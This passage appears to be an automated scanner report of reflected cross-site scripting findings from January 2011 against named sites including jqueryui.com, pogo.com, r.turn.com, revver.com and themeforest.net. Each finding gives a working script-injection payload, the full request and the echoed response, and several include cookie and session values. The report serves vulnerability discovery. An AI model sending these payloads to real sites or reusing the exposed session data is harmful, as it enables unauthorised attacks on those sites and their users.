GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121c90a7"><script>alert(1)</script>c7e036c9077&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sun, 09 Jan 2011 02:22:40 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www4 X-Proxy: 2 Content-Length: 120067
The value of the ffDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5f591"><script>alert(1)</script>d1ac1d809d9 was submitted in the ffDefault parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif5f591"><script>alert(1)</script>d1ac1d809d9&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sun, 09 Jan 2011 02:22:26 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www4 X-Proxy: 2 Content-Length: 120067
The value of the fsDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e6dad"><script>alert(1)</script>f0f44656ea1 was submitted in the fsDefault parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1eme6dad"><script>alert(1)</script>f0f44656ea1&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sun, 09 Jan 2011 02:22:27 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www4 X-Proxy: 2 Content-Length: 120067
The value of the fwDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c205d"><script>alert(1)</script>b9cc9cad223 was submitted in the fwDefault parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normalc205d"><script>alert(1)</script>b9cc9cad223&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sun, 09 Jan 2011 02:22:26 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www3 X-Proxy: 2 Content-Length: 120002
The value of the iconColorContent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 14675"><script>alert(1)</script>e2b32383d99 was submitted in the iconColorContent parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=22222214675"><script>alert(1)</script>e2b32383d99&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sun, 09 Jan 2011 02:22:35 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www4 X-Proxy: 2 Content-Length: 120067
The value of the iconColorDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 109dc"><script>alert(1)</script>b91b6da52c2 was submitted in the iconColorDefault parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888109dc"><script>alert(1)</script>b91b6da52c2&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sun, 09 Jan 2011 02:22:37 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www4 X-Proxy: 2 Content-Length: 120067
The value of the iconColorHeader request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2b66d"><script>alert(1)</script>e5fa0150d60 was submitted in the iconColorHeader parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=2222222b66d"><script>alert(1)</script>e5fa0150d60&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sun, 09 Jan 2011 02:22:31 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www4 X-Proxy: 2 Content-Length: 120067
The value of the iconColorHover request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b0941"><script>alert(1)</script>11047f5e754 was submitted in the iconColorHover parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545b0941"><script>alert(1)</script>11047f5e754&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sun, 09 Jan 2011 02:22:41 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www4 X-Proxy: 2 Content-Length: 120067
<meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" /> <meta nam ...[SNIP]... t=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545b0941"><script>alert(1)</script>11047f5e754&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpa ...[SNIP]...
3.548. http://jqueryui.com/themeroller/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://jqueryui.com
Path:
/themeroller/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8bbf1"><script>alert(1)</script>3e574682b3b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?8bbf1"><script>alert(1)</script>3e574682b3b=1 HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sun, 09 Jan 2011 02:22:21 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www3 X-Proxy: 2 Content-Length: 117121
3.549. http://puzzle-games.pogo.com/games/bejeweled2 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://puzzle-games.pogo.com
Path:
/games/bejeweled2
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a4250"><script>alert(1)</script>e0f9f21b207 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /games/bejeweled2?a4250"><script>alert(1)</script>e0f9f21b207=1 HTTP/1.1 Host: puzzle-games.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of the fpid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ae761"><script>alert(1)</script>e2f6fe1e8ae was submitted in the fpid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /server/pixel.htm?fpid=ae761"><script>alert(1)</script>e2f6fe1e8ae&sp=y&admeld_call_type=iframe&admeld_user_id=6acccca4-d0e4-464e-a824-f67cb28d5556&admeld_adprovider_id=24&admeld_call_type=iframe&admeld_callback=http://tag.admeld.com/match HTTP/1.1 Host: r.turn.com Proxy-Connection: keep-alive Referer: http://www.pandora.com/include/communityAdEmbed.html?genre=&artist=&webname=&sz=728x90&ord=1294536136217419152&clean=0&spgs=0&tile=1&_id=leaderboard_container Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: uid=3011330574290390485; pf=TiY2Y7UsIzsDKs0LviDMrF7Y4FfMul_JqNyl-f7qrdKJwV9kSIzX4BtZ7vBDkFqi6PyIdXvx0rnLfhzRtOOBc34lLZyvKs0UYrWi2iSsDx48XfJgp4muYrbpVMBmU3OKo040jqkTNLCen_tUsnEbNt9he2SzgZbMiSxi7XoC0oAxENxfle1RGFCVxOmt4exBF6G3eK8GfPeHCjDxdpQTpQ
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 P3P: policyref="http://ad.turn.com/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV" Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0 Pragma: no-cache Set-Cookie: uid=3011330574290390485; Domain=.turn.com; Expires=Fri, 08-Jul-2011 02:25:54 GMT; Path=/ Content-Type: text/html;charset=UTF-8 Vary: Accept-Encoding Date: Sun, 09 Jan 2011 02:25:54 GMT Content-Length: 377
The value of the sp request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4b8f9"><script>alert(1)</script>9c556335335 was submitted in the sp parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /server/pixel.htm?fpid=4&sp=4b8f9"><script>alert(1)</script>9c556335335&admeld_call_type=iframe&admeld_user_id=6acccca4-d0e4-464e-a824-f67cb28d5556&admeld_adprovider_id=24&admeld_call_type=iframe&admeld_callback=http://tag.admeld.com/match HTTP/1.1 Host: r.turn.com Proxy-Connection: keep-alive Referer: http://www.pandora.com/include/communityAdEmbed.html?genre=&artist=&webname=&sz=728x90&ord=1294536136217419152&clean=0&spgs=0&tile=1&_id=leaderboard_container Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: uid=3011330574290390485; pf=TiY2Y7UsIzsDKs0LviDMrF7Y4FfMul_JqNyl-f7qrdKJwV9kSIzX4BtZ7vBDkFqi6PyIdXvx0rnLfhzRtOOBc34lLZyvKs0UYrWi2iSsDx48XfJgp4muYrbpVMBmU3OKo040jqkTNLCen_tUsnEbNt9he2SzgZbMiSxi7XoC0oAxENxfle1RGFCVxOmt4exBF6G3eK8GfPeHCjDxdpQTpQ
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 P3P: policyref="http://ad.turn.com/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV" Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0 Pragma: no-cache Set-Cookie: uid=3011330574290390485; Domain=.turn.com; Expires=Fri, 08-Jul-2011 02:25:54 GMT; Path=/ Content-Type: text/html;charset=UTF-8 Vary: Accept-Encoding Date: Sun, 09 Jan 2011 02:25:54 GMT Content-Length: 377
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f05e7"><script>alert(1)</script>a386b442d0f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /video/426755/peanut-labsf05e7"><script>alert(1)</script>a386b442d0f/ HTTP/1.1 Host: revver.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 09 Jan 2011 02:57:06 GMT Server: Apache/2.0.55 (Ubuntu) mod_python/3.1.4 Python/2.4.3 Expires: Sun, 09 Jan 2011 03:02:22 GMT Vary: Cookie Last-Modified: Sun, 09 Jan 2011 02:57:22 GMT ETag: 183ed9bf59280eb87751e627ee9c8247 Cache-Control: max-age=300 Content-Type: text/html; charset=utf-8 Connection: close Content-Length: 81323
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> ...[SNIP]... <form action="/account/login/?next=/video/426755/peanut-labsf05e7"><script>alert(1)</script>a386b442d0f/" autocomplete="off" method="post"> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9f0f8'-alert(1)-'b9a0e02f466 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /user9f0f8'-alert(1)-'b9a0e02f466/freshface/portfolio HTTP/1.1 Host: themeforest.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Server: nginx/0.7.65 Date: Sun, 09 Jan 2011 02:28:55 GMT Content-Type: text/html; charset=utf-8 Connection: close Status: 404 Not Found Content-Length: 20137 Set-Cookie: _fd_session=BAh7BjoPc2Vzc2lvbl9pZCIlZDcyYTU2NzhmYjAyMDIyZGUzNzBmZmFlYzk3OTFiMjk%3D--534caac76947ead77491853a9ba47b4217755cb6; path=/; expires=Tue, 08-Jan-2013 14:28:55 GMT; HttpOnly Cache-Control: no-cache
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <link href="h ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3960e</script><script>alert(1)</script>3ad9a7ed78b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /user/freshface3960e</script><script>alert(1)</script>3ad9a7ed78b/portfolio HTTP/1.1 Host: themeforest.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Server: nginx/0.7.65 Date: Sun, 09 Jan 2011 02:29:00 GMT Content-Type: text/html; charset=utf-8 Connection: close Status: 404 Not Found Content-Length: 20159 Set-Cookie: _fd_session=BAh7BjoPc2Vzc2lvbl9pZCIlZTYwMDA5ZmYwMTEwNjA5Y2RmOGQ2NjE1N2U4ZDhlYWQ%3D--1d2e8164d05571132baa11a7ea7b5a052b5d5deb; path=/; expires=Tue, 08-Jan-2013 14:29:00 GMT; HttpOnly Cache-Control: no-cache
(function() { var ga = document.createElement('script'); ga.src = ('https:' == document.location.protocol ? 'https://ssl' : 'http://www') + '.google-analytics.com/ga.js'; g ...[SNIP]...
3.555. http://word-games.pogo.com/games/scrabble [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://word-games.pogo.com
Path:
/games/scrabble
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9434a"><script>alert(1)</script>13cdeb03797 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
